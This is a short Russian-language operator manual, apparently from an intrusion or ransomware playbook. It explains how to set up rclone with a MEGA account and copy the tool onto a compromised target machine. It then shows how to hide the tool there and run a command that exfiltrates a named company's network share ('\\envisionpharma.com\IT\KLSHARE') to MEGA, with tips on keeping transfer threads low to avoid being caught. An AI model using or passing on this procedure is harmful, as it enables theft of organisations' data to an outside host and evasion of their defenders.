Рклон
для того что бы начать скачивать через рклон нужно создать конфиг
для создания конфига необходимо открыть cmd перейти в дирикторию туда где лежит rclone.exe
запускаем rclone.exe с помощью команды : rclone config
далее выбираем в появившемся меню new remote
называем его mega потом еще раз вводим мега 
после этого вводим адрес почты меги после он спросит свой пасс вводить или сгенерировать мы выбираем свой буквой 'Y' 
пасс не будет появляться при вставке однако он туда все равно вставляется
после создания конфига нас выбрасывает в главное меню и мы выходит из рклона.
далее вводим эту команду rclone.exe config show  она покажет сам конфиг который мы создали
его мы копируем и создаем фаил rclone.conf куда и кладем эту инфу.
поссле того как мы нашли интересующие нас шары мы загружаем exe и конфиг на таргет машину с правами прячем конфиг и экзешку что бы их не нашли
переходим в дерикторию экзешки и даем команду: shell rclone.exe copy "\\envisionpharma.com\IT\KLSHARE" Mega:Finanse -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
где: \\envisionpharma.com\IT\KLSHARE это шары 
Mega:Finanse расположение файлов в меге (может самостоятельно создавать папку в мегу стоит только тут ее указать)
streams 12 --transfers 12 это колличество потоков которые качают на максимум(12) не рекомендую так как можно легко спалиться 
